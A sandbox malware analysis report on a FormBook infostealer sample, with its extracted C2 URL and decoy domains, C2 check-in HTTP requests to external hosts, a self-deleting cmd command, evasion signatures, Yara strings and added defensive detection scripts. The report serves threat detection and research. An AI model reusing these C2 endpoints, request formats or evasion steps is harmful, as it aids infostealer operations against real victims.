Analysis Report 2435.bat

Overview

General Information

Sample Name: 2435.bat (renamed file extension from bat to exe)
Analysis ID: 433173
MD5: 862b4c2abad2c07ac13d5e051c18ab86
SHA1: c78f0a59312c7902e445c5a31d4896907e96475c
SHA256: c347c2d7579053d263f6ab6eddca7bd03691ebab93b30b5caba462caa7106beb
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 2435.exe (PID: 6304 cmdline: 'C:\Users\user\Desktop\2435.exe' MD5: 862B4C2ABAD2C07AC13D5E051C18AB86)
    • 2435.exe (PID: 6340 cmdline: 'C:\Users\user\Desktop\2435.exe' MD5: 862B4C2ABAD2C07AC13D5E051C18AB86)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • control.exe (PID: 6932 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
          • cmd.exe (PID: 3584 cmdline: /c del 'C:\Users\user\Desktop\2435.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
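The tree above ends in `cmd.exe /c del 'C:\Users\user\Desktop\2435.exe'`, launched from control.exe under an explorer.exe that the sample injected into: the payload deletes the dropper that started it. The following is an added detection example, not code from the report or from Joe Sandbox. The events are constructed from the tree above (PIDs and command lines as listed); the image paths `C:\Windows\explorer.exe` and `C:\Windows\SysWOW64\cmd.exe` and the parent PID 1000 used in the second fixture are assumptions, since the report gives only MD5s for those processes. The second fixture matters in practice: host telemetry would not record explorer.exe as a child of 2435.exe, so the ancestor walk alone would miss the link and the fallback over all processes in the window is needed.

```python
"""Flag a cmd.exe `/c del` that removes the image of a process in the tree."""
import re
from collections import namedtuple

Proc = namedtuple("Proc", "pid ppid image cmdline")

# Constructed from the report's process tree. PIDs and command lines are the
# report's; the explorer.exe and cmd.exe image paths are assumed (the report
# gives only MD5s). The sandbox draws explorer.exe under 2435.exe because the
# sample injected into it.
SANDBOX_TREE = [
    Proc(6304, 0,    r"C:\Users\user\Desktop\2435.exe", r"'C:\Users\user\Desktop\2435.exe'"),
    Proc(6340, 6304, r"C:\Users\user\Desktop\2435.exe", r"'C:\Users\user\Desktop\2435.exe'"),
    Proc(3472, 6340, r"C:\Windows\explorer.exe", r"C:\Windows\explorer.exe"),
    Proc(6932, 3472, r"C:\Windows\SysWOW64\control.exe", r"C:\Windows\SysWOW64\control.exe"),
    Proc(3584, 6932, r"C:\Windows\SysWOW64\cmd.exe", r"/c del 'C:\Users\user\Desktop\2435.exe'"),
    Proc(6292, 3584, r"C:\Windows\system32\conhost.exe", r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
]

# The same events as host telemetry would record them: explorer.exe's parent
# (PID 1000, assumed) is unrelated to the sample, so the injected chain no
# longer hangs under 2435.exe.
EDR_VIEW = [p if p.pid != 3472 else p._replace(ppid=1000) for p in SANDBOX_TREE]

# `[cmd.exe] /c del [/switches] <path>`; the path may be single- or double-quoted.
DEL_RE = re.compile(
    r"""^\s*(?:"?\S*?cmd(?:\.exe)?"?\s+)?/c\s+del\s+(?:/[a-z]\s+)*"""
    r"""["']?(?P<path>[^"']+?)["']?\s*$""", re.IGNORECASE)


def del_target(cmdline):
    """Path named by a `/c del` command line, or None if it is not one."""
    m = DEL_RE.match(cmdline)
    return m.group("path") if m else None


def ancestors(events, pid):
    """Parent chain of pid, nearest first, stopping at unknown or looped PIDs."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], {pid}
    cur = by_pid.get(pid)
    while cur and cur.ppid in by_pid and cur.ppid not in seen:
        cur = by_pid[cur.ppid]
        seen.add(cur.pid)
        chain.append(cur)
    return chain


def find_self_deletes(events):
    """(cmd pid, deleted path, relation, matched pid) for every cmd.exe whose
    `del` target is the image of an ancestor ('ancestor') or, failing that,
    of any other process in the window ('other-process')."""
    alerts = []
    for e in events:
        if not e.image.lower().endswith("\\cmd.exe"):
            continue
        target = del_target(e.cmdline)
        if not target:
            continue
        t = target.lower()
        anc = [a for a in ancestors(events, e.pid) if a.image.lower() == t]
        if anc:
            alerts.append((e.pid, target, "ancestor", anc[0].pid))
            continue
        other = [o for o in events if o.image.lower() == t and o.pid != e.pid]
        if other:
            alerts.append((e.pid, target, "other-process", other[0].pid))
    return alerts


if __name__ == "__main__":
    print("sandbox view:", find_self_deletes(SANDBOX_TREE))
    print("edr view:    ", find_self_deletes(EDR_VIEW))
```

The "other-process" fallback is deliberately broad; in production it should be bounded by a time window and by the deleted path living in a user-writable directory, otherwise routine installer cleanup will match.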

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.knighttechinca.com/dxe/"], "decoy": ["sardarfarm.com", "959tremont.com", "privat-livecam.net", "ansel-homebakery.com", "joysupermarket.com", "peninsulamatchmakers.net", "northsytyle.com", "radioconexaoubermusic.com", "relocatingrealtor.com", "desyrnan.com", "onlinehoortoestel.online", "enpointe.online", "rvvikings.com", "paulpoirier.com", "shitarpa.net", "kerneis.net", "rokitreach.com", "essentiallygaia.com", "prestiged.net", "fuerzaagavera.com", "soukid.com", "moderndatingcoach.com", "mentalfreedom.guru", "bullishsoftware.com", "sectorulb.com", "outletyana.com", "fptplaybox.website", "artinmemory.com", "buyruon.com", "ljd.xyz", "mondaysmatters.com", "spiritsoundart.net", "ixiangzu.com", "lacompagniadelfardello.com", "bnctly.com", "sarasvati-yoga.com", "0055game.com", "lagrangewildliferemoval.com", "umlausa.com", "chaytel.com", "kkkc5.com", "union-green.com", "philreid4cc.com", "theanimehat.com", "redlightlegal.com", "myaustraliarewards.com", "barkinlot.com", "mujahidservice.online", "nugeneraonline.com", "sopplugin.com", "makemyroom.design", "ferienschweden.com", "fps2020dkasphotoop.com", "stylezbykay.com", "royalpropertiesgurugram.com", "birzulova.com", "cosmicmtn.com", "kissanime.press", "poweringprogress.today", "omsamedic.com", "drunkpoetsociety.com", "hostbison.com", "asapdecor.com", "houseofsisson.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18409:$sqlite3step: 68 34 1C 7B E1
  • 0x1851c:$sqlite3step: 68 34 1C 7B E1
  • 0x18438:$sqlite3text: 68 38 2A 90 C5
  • 0x1855d:$sqlite3text: 68 38 2A 90 C5
  • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(19 further memory-dump entries are not shown in this extract)

Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.2435.exe.24d0000.3.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0.2.2435.exe.24d0000.3.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.2435.exe.24d0000.3.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18409:$sqlite3step: 68 34 1C 7B E1
  • 0x1851c:$sqlite3step: 68 34 1C 7B E1
  • 0x18438:$sqlite3text: 68 38 2A 90 C5
  • 0x1855d:$sqlite3text: 68 38 2A 90 C5
  • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
1.2.2435.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.2435.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(13 further unpacked-PE entries are not shown in this extract)
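The match listings above give the byte strings of both community rules but not their conditions. The following added example (not code from the report, Joe Security, JPCERT/CC or yara-signator) turns those listed strings into a rule a practitioner can load, scans a buffer for them in pure Python, and decodes the JPCERT/CC strings, each of which is a 5-byte `push imm32` (opcode 0x68) whose operand is the hash of a sqlite3 export name that the rule names (`$sqlite3step`, `$sqlite3text`, `$sqlite3blob`); the hashing algorithm is not shown on this page, so only the immediates are decoded. For orientation, `$sequence_0` (`03 C8 0F 31 2B C1 89 45 FC`) disassembles to `add ecx,eax / rdtsc / sub eax,ecx / mov [ebp-4],eax`, which is the RDTSC timing check listed in the signatures. The buffer is constructed: zeros with each string planted at the offsets the report lists for the first memory dump, so the scan result can be checked against the listing. The `N of them` condition in the generated rule is an assumption, not the original rules' condition.

```python
"""Rebuild the listed Yara strings into a hunting rule and scan a buffer."""

# Strings as listed for the yara-signator rule Formbook_1 (name -> hex bytes).
FORMBOOK_1 = {
    "sequence_0": "03 C8 0F 31 2B C1 89 45 FC",
    "sequence_1": "3C 24 0F 84 76 FF FF FF 3C 25 74 94",
    "sequence_2": "3B 4F 14 73 95 85 C9 74 91",
    "sequence_3": "3C 69 75 44 8B 7D 18 8B 0F",
    "sequence_4": "5D C3 8D 50 7C 80 FA 07",
    "sequence_5": "0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06",
    "sequence_6": "57 89 45 FC 89 45 F4 89 45 F8",
    "sequence_7": "66 89 0C 02 5B 8B E5 5D",
    "sequence_8": "3C 54 74 04 3C 74 75 F4",
    "sequence_9": "56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00",
}

# Strings as listed for the JPCERT/CC rule: each is `push imm32` (opcode 0x68)
# of a hashed sqlite3 export name; the hash algorithm is not given here.
JPCERT_SQLITE = {
    "sqlite3step": "68 34 1C 7B E1",
    "sqlite3text": "68 38 2A 90 C5",
    "sqlite3blob": "68 53 D8 7F 8C",
}

# Offsets the report lists for each string in the first memory dump.
REPORTED_OFFSETS = {
    "sequence_0": [0x98e8, 0x9b62], "sequence_1": [0x15685],
    "sequence_2": [0x15171], "sequence_3": [0x15787], "sequence_4": [0x158ff],
    "sequence_5": [0xa57a], "sequence_6": [0x143ec], "sequence_7": [0xb273],
    "sequence_8": [0x1b327], "sequence_9": [0x1c32a],
    "sqlite3step": [0x18409, 0x1851c], "sqlite3text": [0x18438, 0x1855d],
    "sqlite3blob": [0x1844b, 0x18573],
}


def hexseq(text):
    """'03 C8 0F' -> b'\\x03\\xc8\\x0f'."""
    return bytes.fromhex(text.replace(" ", ""))


def find_all(buf, needle):
    """Every offset of needle in buf, ascending (overlaps included)."""
    hits, pos = [], buf.find(needle)
    while pos != -1:
        hits.append(pos)
        pos = buf.find(needle, pos + 1)
    return hits


def scan(buf, strings):
    """{name: [offsets]} for every string that occurs at least once."""
    result = {}
    for name, text in strings.items():
        hits = find_all(buf, hexseq(text))
        if hits:
            result[name] = hits
    return result


def push_imm32(text):
    """Decode a 5-byte `push imm32` to its little-endian operand."""
    b = hexseq(text)
    if len(b) != 5 or b[0] != 0x68:
        raise ValueError("not a push imm32: " + text)
    return int.from_bytes(b[1:], "little")


def to_yara(rule_name, strings, min_hits):
    """Emit rule text for yara / yara-python. The original rules' conditions
    are not shown in the report, so '<min_hits> of them' is assumed."""
    lines = [f"rule {rule_name}", "{", "    strings:"]
    for name, text in strings.items():
        lines.append(f"        ${name} = {{ {text} }}")
    lines += ["    condition:", f"        {min_hits} of them", "}"]
    return "\n".join(lines)


def build_fixture(size=0x20000):
    """Constructed stand-in for the dump: zeros with each string planted at
    the offsets the report gives, so scan() can be checked against them."""
    buf = bytearray(size)
    for name, offsets in REPORTED_OFFSETS.items():
        data = hexseq(FORMBOOK_1.get(name) or JPCERT_SQLITE[name])
        for off in offsets:
            buf[off:off + len(data)] = data
    return bytes(buf)


if __name__ == "__main__":
    for name, offs in scan(build_fixture(), {**FORMBOOK_1, **JPCERT_SQLITE}).items():
        print(name, [hex(o) for o in offs])
    for name, text in JPCERT_SQLITE.items():
        print(name, hex(push_imm32(text)))
    print(to_yara("FormBook_sqlite_hashes", JPCERT_SQLITE, 2))
```

Run against a real unpacked dump (for example the `.raw.unpack` artefacts named above) rather than the fixture; the generated rule text can be fed straight to `yara` or `yara.compile(source=...)` once a condition appropriate to the hunt is chosen.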

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: 00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.knighttechinca.com/dxe/"], "decoy": ["sardarfarm.com", "959tremont.com", "privat-livecam.net", "ansel-homebakery.com", "joysupermarket.com", "peninsulamatchmakers.net", "northsytyle.com", "radioconexaoubermusic.com", "relocatingrealtor.com", "desyrnan.com", "onlinehoortoestel.online", "enpointe.online", "rvvikings.com", "paulpoirier.com", "shitarpa.net", "kerneis.net", "rokitreach.com", "essentiallygaia.com", "prestiged.net", "fuerzaagavera.com", "soukid.com", "moderndatingcoach.com", "mentalfreedom.guru", "bullishsoftware.com", "sectorulb.com", "outletyana.com", "fptplaybox.website", "artinmemory.com", "buyruon.com", "ljd.xyz", "mondaysmatters.com", "spiritsoundart.net", "ixiangzu.com", "lacompagniadelfardello.com", "bnctly.com", "sarasvati-yoga.com", "0055game.com", "lagrangewildliferemoval.com", "umlausa.com", "chaytel.com", "kkkc5.com", "union-green.com", "philreid4cc.com", "theanimehat.com", "redlightlegal.com", "myaustraliarewards.com", "barkinlot.com", "mujahidservice.online", "nugeneraonline.com", "sopplugin.com", "makemyroom.design", "ferienschweden.com", "fps2020dkasphotoop.com", "stylezbykay.com", "royalpropertiesgurugram.com", "birzulova.com", "cosmicmtn.com", "kissanime.press", "poweringprogress.today", "omsamedic.com", "drunkpoetsociety.com", "hostbison.com", "asapdecor.com", "houseofsisson.com"]}
Multi AV Scanner detection for submitted file
Source: 2435.exe | ReversingLabs: Detection: 43%
Yara detected FormBook
Source: Yara match | File source: 00000000.00000002.236124712.00000000024D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.288063983.0000000000590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.287887430.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.288110425.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.279389714.000000000705E000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.496354910.0000000000A80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.497155166.0000000002FB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.2435.exe.24d0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.2435.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.2435.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.2435.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.2435.exe.24d0000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.2435.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: 2435.exe | Joe Sandbox ML: detected
Source: 1.1.2435.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.2435.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.2435.exe.24d0000.3.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.2.control.exe.4d7f834.4.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 9.2.control.exe.43b090.1.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 2435.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: wntdll.pdbUGP source: 2435.exe, 00000000.00000003.228355721.0000000009B60000.00000004.00000001.sdmp, 2435.exe, 00000001.00000002.288517092.0000000000B6F000.00000040.00000001.sdmp, control.exe, 00000009.00000002.497622003.0000000004710000.00000040.00000001.sdmp
Source: Binary string: control.pdb source: 2435.exe, 00000001.00000002.288197425.0000000000750000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: 2435.exe, control.exe
Source: Binary string: control.pdbUGP source: 2435.exe, 00000001.00000002.288197425.0000000000750000.00000040.00000001.sdmp
Source: C:\Users\user\Desktop\2435.exe | Code function: 0_2_00405E61 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\2435.exe | Code function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\Desktop\2435.exe | Code function: 0_2_0040263E FindFirstFileA,

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49719 -> 199.59.242.153:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49719 -> 199.59.242.153:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49719 -> 199.59.242.153:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49720 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49720 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49720 -> 34.102.136.180:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.knighttechinca.com/dxe/
Source: global traffic | HTTP traffic detected: GET /dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=vA37WJpcpzFfNUYXQYg75GtNYSPqw6GeTU1J6B6lZdudLhYIKqXqgoVRncSpzE3J3g/W HTTP/1.1 | Host: www.northsytyle.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /dxe/?EDHT4Ftp=ZFID08xwVlalm506aQGgsOSl52s9DuDXoXMfw5zeIfbqYw75iNwFl9ES5v0dFSHahSDk&Wj0xll=4hH838s0e HTTP/1.1 | Host: www.shitarpa.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=5uRqQMqQLkS85WfNP4LQlejd47xl1HHY1ecJzVPNghDIfcs4Ugdcj4ECH3F+Zkgn1eRT HTTP/1.1 | Host: www.houseofsisson.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 199.59.242.153
Source: Joe Sandbox View | ASN Name: BODIS-NJUS
Source: global traffic | HTTP traffic detected: GET /dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=vA37WJpcpzFfNUYXQYg75GtNYSPqw6GeTU1J6B6lZdudLhYIKqXqgoVRncSpzE3J3g/W HTTP/1.1 | Host: www.northsytyle.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /dxe/?EDHT4Ftp=ZFID08xwVlalm506aQGgsOSl52s9DuDXoXMfw5zeIfbqYw75iNwFl9ES5v0dFSHahSDk&Wj0xll=4hH838s0e HTTP/1.1 | Host: www.shitarpa.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=5uRqQMqQLkS85WfNP4LQlejd47xl1HHY1ecJzVPNghDIfcs4Ugdcj4ECH3F+Zkgn1eRT HTTP/1.1 | Host: www.houseofsisson.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: unknown | DNS traffic detected: queries for: www.northsytyle.com
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: control.exe, 00000009.00000002.499880225.000000000526F000.00000004.00000001.sdmp | String found in binary or memory: http://houseofsisson.com/dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=5uRqQMqQLkS85WfNP4LQlejd47xl1HHY1ecJzVPNghDI
Source: 2435.exe | String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: 2435.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000002.00000000.253977629.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
